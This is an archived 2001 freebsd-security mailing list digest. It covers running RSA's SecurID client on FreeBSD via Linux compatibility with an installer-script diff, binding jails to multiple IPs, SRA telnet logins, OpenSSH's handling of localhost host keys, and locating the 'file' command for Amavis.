freebsd-security@FreeBSD.ORG Subject: Re: RSA SecurID Client on FreeBSD: Summary Message-ID: <20010507135515.H22195@playboy.com> References: <20010504133228.D21698@playboy.com> <20010507145010.P60366-100000@bsd1.nyct.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010507145010.P60366-100000@bsd1.nyct.net>; from efutch@nyct.net on Mon, May 07, 2001 at 02:51:38PM -0400 X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ah, christ. :-p On Mon, May 07, 2001 at 02:51:38PM -0400, Eric D. Futch wrote: > I had word from someone at RSA that they have just completed a SecurID > client for FreeBSD based on 4.2. They were just waiting for the changes > to be made to the web site. > > -- > Eric Futch New York Connect.Net, Ltd. > efutch@nyct.net Technical Support Staff > http://www.nyct.net (212) 293-2620 > "Bringing New York The Internet Service It Deserves" > KNYC: 07-May-01 13:51 EDT: 61.0 F (16.1 C), clear, humidity 49% > > > On Fri, 4 May 2001, jamie rishaw wrote: > > >I figured it out. > > > > I posted to the list after probably a week plus of hacking around, > >and while this isn't the most elegant solution, it works. > > > > I don't want to provide support, but for sake of list archives and > >other peoples sanity, here are the basic steps I took: > > > > - Grab Linux SecurID client off of RSA site at > > http://www.rsasecurity.com/download/linux/ > > - Un-tar/decompress > > - (Kludge) FreeBSD apparently doesnt have the linux "/bin/line" > > equiv, which is what the `sdsetup` program uses. So, change > > lines in sdsetup to substitute `$LINE_EXEC` (with quotes) to > > anticipated response, like 'y' for 'yes' and 'n' for 'no', and > > directory or pathnames as needed. > > (I'll include a diff at the end of this email) > > - Grab the sdconf.rec from /top/ace/.. on your SecurID server and > > put it in your $CWD > > - Run ./sdsetup -client > > - Add a test user with shell /top/ace/prog/sdshell > > - Add this box to your ACE/Server as a client and add user auth > > as you would any other new client > > - Verify, run, go. > > > > You need to be running Linux compatibility. > > > > I make no guarantees or warranties whatsoever; I am relaying how > >*I* got it to work on systems here. If you do it and lock yourself > >out of your own boxes, don't come running to me. This only protects > >interactive login, I still have yet to tackle FTP, SCP, etc. > > > > Good luck > > > >jamie > > > > > >-- begin diff -- > >103,109d102 > >< if [ ! -f "$LINE_EXEC" ] > >< then > >< echo "#!/bin/sh" > /bin/line > >< echo "read i" >> /bin/line > >< echo "echo \$i" >> /bin/line > >< chmod 555 /bin/line > >< fi > >207c200 > >< YESORNO=`$LINE_EXEC` > >--- > >> YESORNO='y' > >1114c1107 > >< create=`$LINE_EXEC` > >--- > >> create='y' > >1188c1181 > >< input=`$LINE_EXEC` > >--- > >> input='' > >1281c1274 > >< test_owner=`$LINE_EXEC` > >--- > >> test_owner=rsa > >1316c1309 > >< current_platform=`$LINE_EXEC` > >--- > >> current_platform=freebsd > >1468c1461 > >< test_type=`$LINE_EXEC` > >--- > >> test_type=des > >1508c1501 > >< test_path=`$LINE_EXEC` > >--- > >> test_path=/usr/local/rsa > >1631c1624 > >< create=`$LINE_EXEC` > >--- > >> create='' > > > >-- end diff -- > > > > > >On Fri, May 04, 2001 at 11:56:03AM -0500, jamie rishaw wrote: > >> Hi, > >> > >> I'm looking to chat either on- or off-list with people that have > >> successfully integrated RSA's SecurID into FreeBSD. Specifically, > >> the client side. > >> > >> There are no official clients, and when I try to compile commercial > >> SSH with SecurID support, I get "File format not recognized" when the > >> ssh daemon tries to link sdiclient.a symbols (sdiclient.a being the > >> file that the ACE server generates/holds for clients to link in and > >> talk/authenticate with). SSH.com has still yet to reply to my open > >> ticket with them... > >> > >> I have searched high and low for real answers, yet I cannot find > >> anyone that's been able to say, "Yes, I've done it, here's how". > >> > >> URLs, Pointers, etc., are all appreciated. > >> > >> thanks in advance, > >> > >> jamie > >> -- > >> jamie rishaw > >> sr. wan/unix engineer/ninja // playboy enterprises inc. > >> opinions stated are mine, and are not necessarily those of the bunny. > >> > > > >-- > >jamie rishaw > >sr. wan/unix engineer/ninja // playboy enterprises inc. > >opinions stated are mine, and are not necessarily those of the bunny. > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- jamie rishaw sr. wan/unix engineer/ninja // playboy enterprises inc. opinions stated are mine, and are not necessarily those of the bunny. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 12:12:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 4B5A537B422 for ; Mon, 7 May 2001 12:12:29 -0700 (PDT) (envelope-from dave@moo.udder.org) Received: (from dave@localhost) by moo.udder.org id f47JCNc72020 for freebsd-security@freebsd.org; Mon, 7 May 2001 12:12:23 -0700 (PDT) Date: Mon, 7 May 2001 12:12:23 -0700 From: Dave Whitaker To: freebsd-security@freebsd.org Subject: Jails and FreeBSD4.3 Message-ID: <20010507121223.C33043@moo.udder.org> Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Organization: Quiknet Inc. Roseville, CA X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi All, I recently installed FreeBSD 4.3, specifically wanting to mess with jails. Everything appears to work fine, except I use apache with mod_vhost_alias, and proftpd hosting several anonymous ftp sites. I need to get the jail to bind to many IPs, rather than just one. Is there any way to do this, or would anyone be willing to provide me with a patch to do so? Any help is appreciated. Thanks, Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 12:18:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from scribble.fsn.hu (scribble.fsn.hu [193.224.40.95]) by hub.freebsd.org (Postfix) with SMTP id D189337B424 for ; Mon, 7 May 2001 12:18:55 -0700 (PDT) (envelope-from bra@fsn.hu) Received: (qmail 52919 invoked by uid 1000); 7 May 2001 19:18:49 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 May 2001 19:18:49 -0000 Date: Mon, 7 May 2001 21:18:49 +0200 (CEST) From: Attila Nagy To: Dave Whitaker Cc: Subject: Re: Jails and FreeBSD4.3 In-Reply-To: <20010507121223.C33043@moo.udder.org> Message-ID: <20010507211620.L52787-100000@scribble.fsn.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, > I recently installed FreeBSD 4.3, specifically wanting to mess with > jails. Everything appears to work fine, except I use apache with > mod_vhost_alias, and proftpd hosting several anonymous ftp sites. I > need to get the jail to bind to many IPs, rather than just one. Is > there any way to do this, or would anyone be willing to provide me > with a patch to do so? You can solve at least apache with IPF (ipnat) and IPFW. Just forward the needed ports (in case of apache) to the daemon running in the jail. For running an FTP server you have to set up the forward stuff more carefully (maybe with NAT) because of the behaviour of the FTP protocol. -------------------------------------------------------------------------- Attila Nagy e-mail: Attila.Nagy@fsn.hu Budapest Polytechnic (BMF.HU) @work: +361 210 1415 (194) H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 13:29:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 3191E37B422 for ; Mon, 7 May 2001 13:29:08 -0700 (PDT) (envelope-from dave@moo.udder.org) Received: (from dave@localhost) by moo.udder.org id f47KT5673529; Mon, 7 May 2001 13:29:05 -0700 (PDT) Date: Mon, 7 May 2001 13:29:04 -0700 From: Dave Whitaker To: Attila Nagy Cc: freebsd-security@freebsd.org Subject: Re: Jails and FreeBSD4.3 Message-ID: <20010507132904.E33043@moo.udder.org> Mail-Followup-To: Attila Nagy , freebsd-security@freebsd.org References: <20010507123328.D33043@moo.udder.org> <20010507213433.G52787-100000@scribble.fsn.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010507213433.G52787-100000@scribble.fsn.hu>; from bra@fsn.hu on Mon, May 07, 2001 at 09:36:16PM +0200 Organization: Quiknet Inc. Roseville, CA X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Atilla, Yeah, it would be nice if you could bind the jail to a list of IPs or whatever. It seems like it would be the kind of functionality that would be desired by more people than just be. Right now, it's the only thing preventing me from moving anything over to a jail. Almost every service I run needs more than one IP.My $0.02. Dave On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote: > Hello, > > > It uses mod_vhost_alias to pull the file based on the request made. > > If I forward all of the requests to the one IP, it will act as if it > > was requested from that IP, correct? 'sides, shouldn't jail have the > > ability to run on more than one IP if told to? Any more ideas? > Silly me. Never write when you are sleepy :) > > You are right. Personally I don't know about the multiple IP per jail > feature. > > Sorry. > > -------------------------------------------------------------------------- > Attila Nagy e-mail: Attila.Nagy@fsn.hu > Budapest Polytechnic (BMF.HU) @work: +361 210 1415 (194) > H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 13:33:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 56B1337B422 for ; Mon, 7 May 2001 13:33:12 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f47KWs851622; Mon, 7 May 2001 22:32:54 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Dave Whitaker Cc: Attila Nagy , freebsd-security@FreeBSD.ORG Subject: Re: Jails and FreeBSD4.3 In-Reply-To: Your message of "Mon, 07 May 2001 13:29:04 PDT." <20010507132904.E33043@moo.udder.org> Date: Mon, 07 May 2001 22:32:54 +0200 Message-ID: <51620.989267574@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Let me just say that making a multi-IP-number jail is not impossible, only slightly tricky, but it was not in the original contract under which Jail was developed, and that contract is long since closed anyway so I have no funding to pay for my time right now and since I don't need it myself it ain't happening in my spare time... Poul-Henning In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes: >Atilla, > Yeah, it would be nice if you could bind the jail to a list of IPs or whatever. It seems like it would be the kind of functionality that would be desired by more people than just be. Right now, it's the only thing preventing me from moving anything over to a jail. Almost every service I run n >eeds more than one IP.My $0.02. > >Dave > >On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote: >> Hello, >> >> > It uses mod_vhost_alias to pull the file based on the request made. >> > If I forward all of the requests to the one IP, it will act as if it >> > was requested from that IP, correct? 'sides, shouldn't jail have the >> > ability to run on more than one IP if told to? Any more ideas? >> Silly me. Never write when you are sleepy :) >> >> You are right. Personally I don't know about the multiple IP per jail >> feature. >> >> Sorry. >> >> -------------------------------------------------------------------------- >> Attila Nagy e-mail: Attila.Nagy@fsn.hu >> Budapest Polytechnic (BMF.HU) @work: +361 210 1415 (194) >> H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 >> > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 14: 1:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from moo.udder.org (moo.udder.org [207.183.249.210]) by hub.freebsd.org (Postfix) with ESMTP id 529DE37B423 for ; Mon, 7 May 2001 14:01:34 -0700 (PDT) (envelope-from dave@moo.udder.org) Received: (from dave@localhost) by moo.udder.org id f47L1WQ73825; Mon, 7 May 2001 14:01:32 -0700 (PDT) Date: Mon, 7 May 2001 14:01:32 -0700 From: Dave Whitaker To: Jason DiCioccio Cc: freebsd-security@freebsd.org Subject: Re: Jails and FreeBSD4.3 Message-ID: <20010507140132.G33043@moo.udder.org> Mail-Followup-To: Jason DiCioccio , freebsd-security@freebsd.org References: <20010507205812.58C9D13649@bluenugget.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010507205812.58C9D13649@bluenugget.net>; from geniusj@bluenugget.net on Mon, May 07, 2001 at 12:58:08PM -0800 Organization: Quiknet Inc. Roseville, CA X-Operating-System: FreeBSD moo.udder.org 3.5-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org JD: I actually emailed him the same question. He seemed like the appropriate person to ask when I was searching through archives, but I figured I might get more response mailing the list. Dave On Mon, May 07, 2001 at 12:58:08PM -0800, Jason DiCioccio wrote: > Actually.. I thought Robert Watson was working on jail now (among > other things).. That was the case last I talked to him.. > > Cheers, > -JD- > > On Mon, 07 May 2001 22:32:54 +0200 Poul-Henning Kamp wrote: > > > > > Let me just say that making a multi-IP-number jail is not impossible, > > only slightly tricky, but it was not in the original contract under > > which Jail was developed, and that contract is long since closed > > anyway so I have no funding to pay for my time right now and since > > I don't need it myself it ain't happening in my spare time... > > > > Poul-Henning > > > > In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes: > > >Atilla, > > > Yeah, it would be nice if you could bind the jail to a list of IPs > > or whatever. It seems like it would be the kind of functionality > > that would be desired by more people than just be. Right now, it's > > the only thing preventing me from moving anything over to a jail. > > Almost every service I run n > > >eeds more than one IP.My $0.02. > > > > > >Dave > > > > > >On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote: > > >> Hello, > > >> > > >> > It uses mod_vhost_alias to pull the file based on the request made. > > >> > If I forward all of the requests to the one IP, it will act as if it > > >> > was requested from that IP, correct? 'sides, shouldn't jail have the > > >> > ability to run on more than one IP if told to? Any more ideas? > > >> Silly me. Never write when you are sleepy :) > > >> > > >> You are right. Personally I don't know about the multiple IP per jail > > >> feature. > > >> > > >> Sorry. > > >> > > >> > > -------------------------------------------------------------------------- > > >> Attila Nagy e-mail: > > Attila.Nagy@fsn.hu > > >> Budapest Polytechnic (BMF.HU) @work: +361 210 > > 1415 (194) > > >> H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 > > >> > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > > >with "unsubscribe freebsd-security" in the body of the message > > > > > > > -- > > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 > > phk@FreeBSD.ORG | TCP/IP since RFC 956 > > FreeBSD committer | BSD since 4.3-tahoe > > Never attribute to malice what can adequately be explained by > > incompetence. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 14:10:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id A74B937B424 for ; Mon, 7 May 2001 14:10:13 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f47L9w852001; Mon, 7 May 2001 23:09:58 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Jason DiCioccio Cc: bra@fsn.hu, freebsd-security@FreeBSD.ORG, freebsd-security@pozer.org Subject: Re: Jails and FreeBSD4.3 In-Reply-To: Your message of "Mon, 07 May 2001 12:58:08 PST." <20010507205812.58C9D13649@bluenugget.net> Date: Mon, 07 May 2001 23:09:58 +0200 Message-ID: <51999.989269798@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org He is, but I don't know what the ETA of jailNG is... In message <20010507205812.58C9D13649@bluenugget.net>, Jason DiCioccio writes: >Actually.. I thought Robert Watson was working on jail now (among >other things).. That was the case last I talked to him.. > >Cheers, >-JD- > >On Mon, 07 May 2001 22:32:54 +0200 Poul-Henning Kamp wrote: > >> >> Let me just say that making a multi-IP-number jail is not impossible, >> only slightly tricky, but it was not in the original contract under >> which Jail was developed, and that contract is long since closed >> anyway so I have no funding to pay for my time right now and since >> I don't need it myself it ain't happening in my spare time... >> >> Poul-Henning >> >> In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes: >> >Atilla, >> > Yeah, it would be nice if you could bind the jail to a list of IPs >> or whatever. It seems like it would be the kind of functionality >> that would be desired by more people than just be. Right now, it's >> the only thing preventing me from moving anything over to a jail. >> Almost every service I run n >> >eeds more than one IP.My $0.02. >> > >> >Dave >> > >> >On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote: >> >> Hello, >> >> >> >> > It uses mod_vhost_alias to pull the file based on the request made. >> >> > If I forward all of the requests to the one IP, it will act as if it >> >> > was requested from that IP, correct? 'sides, shouldn't jail have the >> >> > ability to run on more than one IP if told to? Any more ideas? >> >> Silly me. Never write when you are sleepy :) >> >> >> >> You are right. Personally I don't know about the multiple IP per jail >> >> feature. >> >> >> >> Sorry. >> >> >> >> >> -------------------------------------------------------------------------- >> >> Attila Nagy e-mail: >> Attila.Nagy@fsn.hu >> >> Budapest Polytechnic (BMF.HU) @work: +361 210 >> 1415 (194) >> >> H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 >> >> >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-security" in the body of the message >> > >> >> -- >> Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 >> phk@FreeBSD.ORG | TCP/IP since RFC 956 >> FreeBSD committer | BSD since 4.3-tahoe >> Never attribute to malice what can adequately be explained by >> incompetence. >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 14:29:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (babyviolence.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 8670F37B422 for ; Mon, 7 May 2001 14:29:46 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from bluenugget.net (localhost.com [127.0.0.1]) by bluenugget.net (Postfix) with ESMTP id 58C9D13649; Mon, 7 May 2001 13:58:12 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary To: phk@critter.freebsd.dk From: Jason DiCioccio Cc: bra@fsn.hu, freebsd-security@FreeBSD.ORG, freebsd-security@pozer.org X-Originating-Ip: 63.93.9.98 MIME-Version: 1.0 Reply-To: Jason DiCioccio Date: Mon, 07 May 2001 12:58:08 PST X-Mailer: EMUmail 4.5 Subject: Re: Jails and FreeBSD4.3 X-Webmail-User: geniusj@bluenugget.net Message-Id: <20010507205812.58C9D13649@bluenugget.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually.. I thought Robert Watson was working on jail now (among other things).. That was the case last I talked to him.. Cheers, -JD- On Mon, 07 May 2001 22:32:54 +0200 Poul-Henning Kamp wrote: > > Let me just say that making a multi-IP-number jail is not impossible, > only slightly tricky, but it was not in the original contract under > which Jail was developed, and that contract is long since closed > anyway so I have no funding to pay for my time right now and since > I don't need it myself it ain't happening in my spare time... > > Poul-Henning > > In message <20010507132904.E33043@moo.udder.org>, Dave Whitaker writes: > >Atilla, > > Yeah, it would be nice if you could bind the jail to a list of IPs > or whatever. It seems like it would be the kind of functionality > that would be desired by more people than just be. Right now, it's > the only thing preventing me from moving anything over to a jail. > Almost every service I run n > >eeds more than one IP.My $0.02. > > > >Dave > > > >On Mon, May 07, 2001 at 09:36:16PM +0200, Attila Nagy wrote: > >> Hello, > >> > >> > It uses mod_vhost_alias to pull the file based on the request made. > >> > If I forward all of the requests to the one IP, it will act as if it > >> > was requested from that IP, correct? 'sides, shouldn't jail have the > >> > ability to run on more than one IP if told to? Any more ideas? > >> Silly me. Never write when you are sleepy :) > >> > >> You are right. Personally I don't know about the multiple IP per jail > >> feature. > >> > >> Sorry. > >> > >> > -------------------------------------------------------------------------- > >> Attila Nagy e-mail: > Attila.Nagy@fsn.hu > >> Budapest Polytechnic (BMF.HU) @work: +361 210 > 1415 (194) > >> H-1084 Budapest, Tavaszmezo u. 15-17. cell.: +3630 306 6758 > >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > -- > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 > phk@FreeBSD.ORG | TCP/IP since RFC 956 > FreeBSD committer | BSD since 4.3-tahoe > Never attribute to malice what can adequately be explained by > incompetence. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 14:31:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from citadel.simphost.com (citadel.simphost.com [216.253.163.10]) by hub.freebsd.org (Postfix) with ESMTP id E998737B423; Mon, 7 May 2001 14:31:14 -0700 (PDT) (envelope-from jlschwab@simphost.com) Received: by citadel.simphost.com (Postfix, from userid 1000) id 17EEC24D04; Mon, 7 May 2001 12:35:48 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by citadel.simphost.com (Postfix) with ESMTP id ED7A020F03; Mon, 7 May 2001 12:35:47 -0400 (EDT) Date: Mon, 7 May 2001 12:35:47 -0400 (EDT) From: jlschwab To: , Subject: SRA.. Message-ID: <20010507123414.X2167-100000@citadel.simphost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Heya Guys and Gals; Trying any.of.my.machines.ips... Connected to X.X.X.X. Escape character is '^]'. Trying SRA secure login: User (root): Password: what is SRA, secure telnet login? and how can I disable this? I also noticed it only works from freebsd -> freebsd boxes thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 16:45:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 840E137B422 for ; Mon, 7 May 2001 16:45:40 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id BAA54078; Tue, 8 May 2001 01:45:33 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Poul-Henning Kamp Cc: Jason DiCioccio , bra@fsn.hu, freebsd-security@FreeBSD.ORG, freebsd-security@pozer.org Subject: Re: Jails and FreeBSD4.3 References: <51999.989269798@critter> From: Dag-Erling Smorgrav Date: 08 May 2001 01:45:33 +0200 In-Reply-To: <51999.989269798@critter> Message-ID: Lines: 8 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp writes: > He is, but I don't know what the ETA of jailNG is... I think "never in RELENG_4" is a safe assumption. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 7 17:52:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id 6145737B423 for ; Mon, 7 May 2001 17:52:30 -0700 (PDT) (envelope-from docs@mailer.progressive-comp.com) Received: (from docs@localhost) by mailer.progressive-comp.com with id UAA10252; Mon, 7 May 2001 20:51:44 -0400 Date: Mon, 7 May 2001 20:51:44 -0400 Message-Id: <200105080051.UAA10252@mailer.progressive-comp.com> From: Hank Leininger Reply-To: Hank Leininger To: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH accepts any RSA key from host 127.0.0.1, even on non-default ports X-Shameless-Plug: Check out http://marc.theaimsgroup.com/ X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com X-Warning: Report any violation of list policy to abuse@progressive-comp.com X-Posted-By: Hank Leininger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2001-05-03, Robert Watson wrote: > and was told it was a "feature" -- intended to allow people to "ssh > localhost" without getting key errors when using NFS mounted home > directories. Bleh. That rationale sounds reasonable, but even if so, IMHO only 127.0.0.1 should be magical this way. Connecting to other loopback net addresses (127.213.75.23, etc) should be checked as usual. Then one could use alternate loopback addrs for specific tunnels, each of which can have their own host key. > really, it would be nice if there was a way to say: > ssh -p 5646 -usekeyfor fledge.watson.org localhost > I.e., connect to localhost:5646, but use the host key associated with > fledge.watson.org in the keys file. Would something like setting HostKeyAlias work? ssh -p 5646 -o HostKeyAlias=fledge.watson.org localhost (Of course the above is bogus since localhost is magically accepted...) Then you'd set up ~/.ssh/config entries so that 'ssh fledge' automatically connected to localhost:5646 (or 127.156.12.50:5646) with the right HostKeyAlias set. -- Hank Leininger To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 2:40: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13802.mail.yahoo.com (web13802.mail.yahoo.com [216.136.175.12]) by hub.freebsd.org (Postfix) with SMTP id 05A0B37B422 for ; Tue, 8 May 2001 02:40:03 -0700 (PDT) (envelope-from uktests@yahoo.com) Message-ID: <20010508094002.41629.qmail@web13802.mail.yahoo.com> Received: from [159.148.130.2] by web13802.mail.yahoo.com; Tue, 08 May 2001 02:40:02 PDT Date: Tue, 8 May 2001 02:40:02 -0700 (PDT) From: John Braun Subject: Problems with Amavis setup To: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! I can't download "file" command for "Amavis" from ftp://ftp.astron.com/pub/file/, ftp://ftp.gw.com/pub/unix/file/ and ftp://ftp.funet.fi/pub/unix/tools/file/. Where can I get this command ? regards Uldis __________________________________________________ Do You Yahoo!? Yahoo! Auctions - buy the things you want at great prices http://auctions.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 6:45:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 567DE37B423 for ; Tue, 8 May 2001 06:45:35 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1289 invoked by uid 1000); 8 May 2001 14:57:35 -0000 Date: Tue, 8 May 2001 17:57:35 +0300 From: Peter Pentchev To: John Braun Cc: freebsd-security@FreeBSD.ORG Subject: Re: Problems with Amavis setup Message-ID: <20010508175735.A1248@ringworld.oblivion.bg> Mail-Followup-To: John Braun , freebsd-security@FreeBSD.ORG References: <20010508094002.41629.qmail@web13802.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010508094002.41629.qmail@web13802.mail.yahoo.com>; from uktests@yahoo.com on Tue, May 08, 2001 at 02:40:02AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote: > Hi! > > I can't download "file" command for "Amavis" from > > ftp://ftp.astron.com/pub/file/, > ftp://ftp.gw.com/pub/unix/file/ and > ftp://ftp.funet.fi/pub/unix/tools/file/. > > Where can I get this command ? The 'file' command is part of FreeBSD; it is installed as part of the FreeBSD installation. Look for it in /usr/bin. If Amavis cannot execute the 'file' command, make sure it has /usr/bin in its path. G'luck, Peter -- This sentence no verb. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 8 6:52:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from rafiu.psi-domain.co.uk (rafiu.psi-domain.co.uk [212.87.84.199]) by hub.freebsd.org (Postfix) with ESMTP id 4897037B423 for ; Tue, 8 May 2001 06:52:56 -0700 (PDT) (envelope-from 